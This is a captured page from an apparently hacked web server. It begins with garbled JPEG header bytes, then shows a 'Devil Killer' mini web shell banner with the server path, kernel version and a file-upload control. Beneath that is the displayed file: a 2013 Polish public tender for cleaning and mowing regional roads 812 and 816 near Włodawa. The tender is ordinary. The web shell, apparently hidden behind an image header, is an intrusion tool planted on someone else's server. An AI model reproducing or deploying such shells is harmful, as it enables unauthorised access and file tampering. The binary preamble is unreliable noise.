JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130218/25595-N-2013.html

<p class="kh_header"><b>Włodawa: Utrzymanie czystości w pasach drogowych dróg Wojewódzkich:
     1) Zadanie Nr 1 - droga wojewódzka nr 812  
     2) Zadanie Nr 2 - droga wojewódzka nr 816</b><br>
<b>Numer ogłoszenia: 25595 - 2013; data zamieszczenia: 18.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich Lublin Rejon Dróg Wojewódzkich we Włodawie , ul. Lubelska 60, 22-200 Włodawa, woj. lubelskie, tel. 082 5721635, 5721151, faks 082 5721793.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości w pasach drogowych dróg Wojewódzkich:
     1) Zadanie Nr 1 - droga wojewódzka nr 812  
     2) Zadanie Nr 2 - droga wojewódzka nr 816.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres usług obejmuje:
1.1. Zadanie Nr 1 - droga wojewódzka nr 812
1.Oczyszczenie jezdni po okresie zimowym (rondo)
 im. Kuraszkiewicza	- 2116 m2	jednokrotnie;       2.Oczyszczenie chodników i ścieżki pieszo-rowerowej po okresie zimowym na odcinku od ul Żołnierzy WiN 
do m. Okuninka II tj. od km 74+780 do km 82+195  - 26300 m2	jednokrotnie;
3. Oczyszczenie jezdni w okresie maj-listopad (rondo)
im. Kuraszkiewicza	2116 m2	dwukrotnie;      4.	Oczyszczenie chodników i ścieżki pieszo-rowerowej w okresie maj-listopad na odcinku od km 74+780 do km 82+195 -26300 m2	dwukrotnie;     5.	Koszenie traw i chwastów wraz ze zgrabieniem i usunięciem wykoszonej trawy i chwastów oraz zebranie i usunięcie śmieci.			
1) na odcinku od km 74+780 do km 82+195- strona lewa	-43 264 m2 trzykrotnie	2) na odcinku od km 75+390 do km 75+700 - strona prawa -	 1 240 m2	trzykrotnie	3) skrzyżowanie rondo im. Kuraszkiewicza + dojazdy	-  2 088 m2	trzykrotnie       6.	Koszenie traw i chwastów z zebraniem i usunięciem śmieci, bez zebrania i usunięcia wykoszonej trawy i chwastów 
1) na odcinku od km 74+150 do km 75+060, od km 75+150 do km 75+390 i od km 75+700 do km 77+170 - strona prawa - 38150	m2 trzykrotnie;3
7. Zbieranie śmieci z pasa drogowego na odcinku od km 74+132 do km 82+195 
- 118603 m2 35 razy (1 raz w tygodniu )
w tym:
1) od km 74+132 do km 77+132 - obustronnie,
2) od km 77+132 do km 82+195 - strona lewa	
8. Opróżnianie koszy ze śmieci wraz z wymianą worków i utrzymaniem koszy w czystości	 - 4 szt.	78 krotnie (2 razy w tygodniu)

 1.2. Zadanie Nr 2 - droga wojewódzka nr 816. 
1. Oczyszczenie jezdni po okresie zimowym na odcinku od km 59+226 do km 60+129 i od km 60+132 do km 62+440	 - 3 699 m2 jednokrotnie;
2. Oczyszczenie chodników i ścieżki pieszo-rowerowej po okresie zimowym na odcinku Suszno - Orchówek od km 59+226 do km 63+240	-11 448 m2 jednokrotnie;
3. Oczyszczenie jezdni w okresie maj-listopad odcinek  Suszno - Orchówek od km 60+132 do km 62 +440 -3 495 m2 czterokrotnie;	
4. Oczyszczenie chodników w okresie maj-listopad na odcinku od km 60+132 do km 62+440 - 6 952 m2 czterokrotnie	
5. Koszenie traw i chwastów wraz ze zgrabieniem i usunięciem wykoszonej trawy i chwastów oraz zebranie i usunięcie śmieci i liści:
1) odcinek od km 59+200 do km 59+310 - strona lewa - 150 m2 czterokrotnie;
2) odcinek od km 59+310 do km 59+606 - strona prawa -1036 m2 czterokrotnie;
3) odcinek od km 59+606 do km 60+120 - strona prawa -	1799 m2 czterokrotnie;
4) odcinek od km 59+960 do km 60+120 - strona lewa - 640 m2 czterokrotnie;
5) odcinek od km 60+130 do km 62+440 - obustronnie - 9267 m2 pięciokrotnie;
6) odcinek od km 62+440  do km 63+230 - strona lewa -3950 m2 czterokrotnie;
6. Koszenie traw i chwastów z zebraniem i usunięciem śmieci, bez zebrania i usunięcia wykoszonej trawy i chwastów 	
1) odcinek od km 59+200 do km 59+300 - strona prawa -	1 030 m2 czterokrotnie;
2) odcinek od km 59+300 do km 59+960 - strona lewa - 5 280 m2 czterokrotnie;
3) odcinek od km 62+440 do km 63+230 - strona prawa -	6 320 m2 czterokrotnie;
7.Zbieranie śmieci z pasa drogowego na odcinku Suszno - Orchówek  od km 59+200 do km 63+230 - 42 443 m2 35 krotnie (1 raz w tygodniu)
8.Opróżnianie koszy ze śmieci wraz z wymianą worków - 43 szt. 78 krotnie (2 razy w tygodniu)
1)	o pojemności 40 l - 5 szt.
2)	o pojemności 60 l - 38 szt.	
2. Zamawiający zastrzega sobie prawo zmniejszenia ilości usług poprzez zmniejszenie krotności ich wykonania.
3. Jezdnię należy sprzątać na szerokości 0,75 m od krawędzi (krawężnika) po obu 
     stronach drogi.
4. Chodniki i ścieżki rowerowe należy sprzątać na całej szerokości, usuwając
    jednocześnie porastające  nawierzchnię trawę i chwasty. Szczotki mechaniczne użyte do 
    oczyszczenia chodników i ścieżek nie mogą powodować odkształceń nawierzchni.   
5. Sprzątanie należy wykonywać w godzinach o najmniejszym natężeniu ruchu.
6. Do oczyszczania mechanicznego należy stosować szczotki mechaniczne (urządzenia
    dwuszczotkowe) składające się ze szczotki wykonanej z twardych elementów
    czyszczących do zdrapywania i usuwania zanieczyszczeń, oraz szczotki miękkiej 
    służącej do zamiatania i usuwania zanieczyszczeń nie związanych z podłożem.
    W przypadku braku możliwości użycia szczotki mechanicznej dopuszcza się 
    oczyszczanie ręczne  przy użyciu szczotek i łopat.
7. Zebrane śmieci, zanieczyszczenia, zgrabione trawy, chwasty i liście 
    Wykonawca we własnym zakresie i na swój koszt wywiezie na składowisko
    odpadów lub w  inne dopuszczone przepisami prawa miejsce w celu  ich
    unieszkodliwienia lub odzysku. 
8. Wykonawca zabezpieczy we własnym zakresie i na swój koszt wszystkie
    niezbędne do realizacji zamówienia środki transportowe, sprzęt i materiały.
9. Wykonawca będzie wykonywał usługę z zachowaniem wszelkich warunków 
     bezpieczeństwa.
10. Oznakowanie prac prowadzonych w pasie drogowym należy do Wykonawcy
     i powinno być zgodne z Projektem tymczasowej organizacji ruchu udostępnionym
     przez Zamawiającego.
11.Pracownicy Wykonawcy winni być ubrani w kamizelki ostrzegawcze, a pracujący sprzęt
     bezwzględnie wyposażony w lampę błyskową koloru żółtego. 
12. Warunki realizacji zamówienia:
a)  decyzję o konieczności wykonywania poszczególnych usług objętych zamówieniem (z wyłączeniem opróżniania koszy i zbierania śmieci) podejmować będzie Kierownik Rejonu Dróg Wojewódzkich  we Włodawie.
b)	wzywanie do pracy zespołów roboczych Wykonawcy odbywać się będzie pisemnie przez upoważnionego pracownika Zamawiającego (nie dotyczy opróżniania koszy ze śmieci wraz z wymianą worków i uprzątnięciem terenu wokół koszy, które to czynności należy wykonywać bez wezwania 2 razy w tygodniu - poniedziałek i czwartek oraz zbierania śmieci z pasa drogowego, które należy zbierać 1raz w tygodniu - środa ).Zgodnie z art. 30 ust. 4 ustawy, Zamawiający  dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane usługi spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy Prawo zamówień publicznych).
Szacunkowa wartość zamówienia netto: Zadanie Nr 1 - 77310,31 PLN, Zadanie Nr 2 - 43849,57 PLN.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.51.13.00-5, 77.31.41.00-5, 77.31.20.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania uprawnień do wykonywania
    określonej działalności Wykonawca winien wykazać się posiadaniem ważnego
    dokumentu uprawniającego do prowadzenia działalności w zakresie zbierania i
    transportu odpadów, 
Ocena spełniania warunku spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań, których spełnienie Wykonawca
     zobowiązany jest wykazać w sposób szczególny. Ocena spełniania warunków
     posiadania  dokonywana będzie na podstawie załączonego do oferty
     oświadczenia o spełnianiu warunków udziału w postępowaniu. Ocena spełniania warunku  spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania odpowiednim potencjałem
    technicznym Wykonawca winien dysponować niżej wymienionymi jednostkami
    sprzętowymi i transportowymi (minimalna ilość na 1 zadanie):
1) Szczotka mechaniczna - 1 szt.
2) Kosiarka spalinowa do trawników - 2 szt.
3) Kosa spalinowa na wysięgniku - 2 szt.
4) Ciągnik z przyczepą lub samochód ciężarowy - 1 szt.
Ocena spełniania warunku spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań, których 
    spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. 
    Ocena  spełniania warunków posiadania  dokonywana będzie na podstawie
    załączonego do oferty oświadczenia o spełnianiu warunków udziału w
    postępowaniu.
Ocena spełniania warunku spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań, których 
    spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. 
    Ocena  spełniania warunków posiadania  dokonywana będzie na podstawie
    załączonego do oferty oświadczenia o spełnianiu warunków udziału w
    postępowaniu.
Ocena spełniania warunku spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oprócz oświadczeń lub dokumentów, które należy dołączyć w celu
     potwierdzenia spełniania warunków udziału w postępowaniu  Wykonawca obowiązany
     jest dołączyć do oferty:
1)	Ofertę przetargową (z ceną netto i z podatkiem VAT)  wraz z załącznikiem do oferty formularz cenowy ;    2)	Zgodę/umowę na przyjęcie zebranych odpadów na składowisko odpadów.
3)	Wykaz części zamówienia, których wykonanie Wykonawca zamierza powierzyć podwykonawcy;  4)	Podpisany wzór umowy;  5)	W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, 
     do oferty należy dołączyć dokument (np. odpowiednią umowę) ustanawiający 
     pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia 
     albo reprezentowania w postępowaniu i zawarcia umowy   w sprawie zamówienia
     publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych;
6)	W przypadku podpisania oferty i innych dokumentów  przez osobę/osoby,  które nie są wymienione w odpisie z właściwego rejestru albo zaświadczeniu o wpisie do ewidencji działalności gospodarczej, do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zmiany i  uzupełnienia  treści umowy wymagają dla swej ważności formy pisemnej.
2.  Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje
      możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty,
      polegających na:
1)	Zmianie wynagrodzenia w przypadku zmiany stawek podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.lublin.pl/news.php<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie 22-200 Włodawa, ul. Lubelska 60
w pokoju nr 11 w godz. 07:00 - 15:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2013 godzina 09:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie 22-200 Włodawa, ul. Lubelska 60,  pokój nr 5 (sekretariat) 
Otwarcie ofert w dniu 28.02.2013r., godz. 09:10, pokój nr 6..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W niniejszym postępowaniu oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują faksem na nr 82 572 17 93; 572 41 62 lub drogą elektroniczną na adres  e-mail: rdw.wlodawa@zdw.lublin.pl.
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej  niezwłocznie potwierdza fakt ich otrzymania.
Osoby uprawnione do porozumiewania się  z Wykonawcami:
1)	W sprawach technicznych - Krystyna Kowalewska  tel. (82 572 19 52)
2)	W sprawach formalno -prawnych związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - Barbara Winiarczyk tel. (82 572 16 35), 
      Eugeniusz Kiewczykowski  tel. (82 572 16 35)
 UWAGA!
Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej Zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są o  przesłanie  krótkiej informacji zawierającej podstawowe dane firmy (nazwa, adres, nr telefonu, faxu, adres poczty elektronicznej) faksem nr 82 572-17-93; 82 572-41-62 
lub drogą elektroniczną na adres: rdw.wlodawa@zdw.lublin.pl.
Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego bezpośrednio zawiadamiani o np.: zapytaniach, wyjaśnieniach  i zmianach dotyczących Specyfikacji Istotnych Warunków Zamówienia,  przedłużeniu terminu składania ofert. 
Pouczenie o środkach ochrony prawnej przysługujących wykonawcy      w toku postępowania o udzielenie zamówienia

1. Odwołanie przysługuje wyłącznie od niezgodnej z przepisami ustawy czynności
    zamawiającego podjętej w postępowaniu o udzielenie zamówienia lub zaniechania 
    czynności, do której zamawiający jest zobowiązany na podstawie ustawy.
2. Odwołanie przysługuje zgodnie z art. 180 ust. 2 ustawy Prawo zamówień publicznych 
    (Dz. U. z 2010 r.  Nr 113 poz. 759 z późn. zmian.) wyłącznie wobec czynności:
     1) opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu,
     2) wykluczenia odwołującego z postępowania o udzielenie zamówienia,
     3) odrzucenia oferty odwołującego.

3. Odwołanie powinno wskazywać czynność lub zaniechanie czynności Zamawiającego, 
    której zarzuca się niezgodność z przepisami ustawy, zawierać zwięzłe przedstawienie 
    zarzutów, określać żądanie oraz wskazywać okoliczności faktyczne i prawne 
    uzasadniające wniesienie odwołania. 
4. Odwołanie wnosi się do Prezesa Izby w formie pisemnej albo elektronicznej opatrzonej
    bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego 
    kwalifikowanego certyfikatu.
5. Odwołujący przesyła kopię odwołania Zamawiającemu przed upływem terminu do
    wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed
    upływem tego terminu. Domniemywa się, iż Zamawiający mógł zapoznać się z treścią odwołania przed upływem terminu na jego wniesienie, jeżeli przesłanie jego kopii nastąpiło przed upływem na jego wniesienie za pomocą jednego ze sposobów określonych w art. 27 ust. 2 ustawy.
6. Zgodnie z art. 182 ust. 1 pkt. 2) odwołanie wnosi się w terminie 5 dni od dnia przesłania informacji o czynności zamawiającego stanowiącej podstawę jego wniesienia  - jeżeli zostały przesłane w sposób określony w art. 27 ust. 2, albo w terminie 10 dni - jeżeli zostały przesłane w inny sposób.
7. Zgodnie z art. 182 ust 2 pkt. 2 odwołanie wobec treści ogłoszenia o zamówieniu wnosi się w terminie 5 dni od dnia zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych lub specyfikacji istotnych warunków zamówienia na stronie internetowej.
8. Odwołanie wobec czynności innych niż określone w pkt. 6 i 7 wnosi się w terminie 5 dni od dnia, w którym  powzięto lub przy zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia.
9. Jeżeli Zamawiający nie przesłał Wykonawcy zawiadomienia o wyborze najkorzystniejszej oferty odwołanie wnosi się w terminie 15 dni od dnia zamieszczenia w Biuletynie Zamówień Publicznych ogłoszenia o udzieleniu zamówienia.
10. Jeżeli Zamawiający nie zamieścił w Biuletynie Zamówień Publicznych ogłoszenia o udzieleniu zamówienia odwołanie wnosi się w terminie 1 miesiąca od dnia zawarcia umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - droga wojewódzka nr 812.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres usług obejmuje:
1.Oczyszczenie jezdni po okresie zimowym (rondo)
